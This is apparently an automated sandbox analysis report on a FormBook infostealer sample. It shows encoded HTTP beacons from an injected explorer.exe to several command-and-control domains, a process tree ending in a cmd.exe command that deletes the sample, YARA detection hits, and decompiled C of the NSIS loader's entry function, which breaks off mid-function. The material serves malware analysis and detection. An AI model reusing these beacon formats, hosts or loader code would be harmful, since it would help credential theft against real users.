                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.649747154.215.150.18380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:09.183716059 CEST6657OUTGET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1
                                                                                                          Host: www.thechandeck.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:09.463644028 CEST6657INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 11 Jun 2021 06:55:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 1.0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.649748185.224.138.8380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:14.730818033 CEST6659OUTGET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1
                                                                                                          Host: www.bancambios.network
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:14.783538103 CEST6660INHTTP/1.1 404 Not Found
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html
                                                                                                          Last-Modified: Tue, 25 Jun 2019 07:07:25 GMT
                                                                                                          Etag: "999-5d11c82d-331806d17fbda5d0;;;"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2457
                                                                                                          Date: Fri, 11 Jun 2021 06:55:14 GMT
                                                                                                          Server: LiteSpeed
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                                                                                          Jun 11, 2021 08:55:14.783576965 CEST6662INData Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65
                                                                                                          Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                                                                                          Jun 11, 2021 08:55:14.783593893 CEST6662INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: </div> </div></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.649751119.81.95.14680C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:20.305771112 CEST6681OUTGET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1
                                                                                                          Host: www.purpleqube.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:20.505008936 CEST6681INHTTP/1.1 302 Found
                                                                                                          Date: Fri, 11 Jun 2021 06:55:20 GMT
                                                                                                          Server: Apache
                                                                                                          Location: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd
                                                                                                          Content-Length: 325
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 75 72 70 6c 65 71 75 62 65 2e 63 6f 6d 2f 62 70 33 69 2f 3f 6f 36 74 54 48 48 68 68 3d 49 6b 51 75 43 46 6c 37 4d 43 66 42 52 6a 2f 56 7a 2b 6f 39 53 5a 4b 75 34 7a 51 65 50 2b 35 48 51 4c 78 38 57 55 63 4a 62 65 56 6b 74 45 57 31 39 77 45 64 41 38 45 74 62 6d 6e 68 71 6c 53 51 61 49 59 61 6e 66 46 51 6e 51 3d 3d 26 61 6d 70 3b 33 66 75 44 5f 3d 53 32 4d 74 59 4c 47 58 30 76 46 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&amp;3fuD_=S2MtYLGX0vFd">here</a>.</p></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.649752184.175.83.6480C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:25.861802101 CEST6682OUTGET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1
                                                                                                          Host: www.middreampostal.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:27.224795103 CEST6683INHTTP/1.1 301 Moved Permanently
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                          X-Redirect-By: WordPress
                                                                                                          Location: http://middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==
                                                                                                          Content-Length: 0
                                                                                                          Date: Fri, 11 Jun 2021 06:55:26 GMT
                                                                                                          Server: LiteSpeed


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.649753150.95.255.3880C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:32.021022081 CEST6684OUTGET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1
                                                                                                          Host: www.xn---yado-8e4dze0c.site
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:32.328037977 CEST6684INHTTP/1.1 302 Found
                                                                                                          Date: Fri, 11 Jun 2021 06:55:32 GMT
                                                                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                          Location: http://dfltweb1.onamae.com
                                                                                                          Content-Length: 210
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.649754184.168.131.24180C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 11, 2021 08:55:37.621895075 CEST6685OUTGET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1
                                                                                                          Host: www.oceancollaborative.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 11, 2021 08:55:37.868011951 CEST6686INHTTP/1.1 302 Found
                                                                                                          Server: nginx/1.16.1
                                                                                                          Date: Fri, 11 Jun 2021 06:55:37 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: 5t2CmTUhKc.exe PID: 6368 Parent PID: 5932

                                                                                                          General

                                                                                                          Start time:08:53:36
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:225177 bytes
                                                                                                          MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: 5t2CmTUhKc.exe PID: 6432 Parent PID: 6368

                                                                                                          General

                                                                                                          Start time:08:53:37
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:225177 bytes
                                                                                                          MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: explorer.exe PID: 3440 Parent PID: 6432

                                                                                                          General

                                                                                                          Start time:08:53:42
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:
                                                                                                          Imagebase:0x7ff6f22f0000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: help.exe PID: 7136 Parent PID: 6432

                                                                                                          General

                                                                                                          Start time:08:54:15
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\help.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                          Imagebase:0x13b0000
                                                                                                          File size:10240 bytes
                                                                                                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:moderate

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 5696 Parent PID: 7136

                                                                                                          General

                                                                                                          Start time:08:54:17
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
                                                                                                          Imagebase:0x2a0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: conhost.exe PID: 5688 Parent PID: 5696

                                                                                                          General

                                                                                                          Start time:08:54:17
                                                                                                          Start date:11/06/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff61de10000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >

                                                                                                            Analysis Process: 5t2CmTUhKc.exe PID: 6368 Parent PID: 5932 5t2CmTUhKc.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\engineer\\Desktop\\5t2CmTUhKc.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\engineer\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
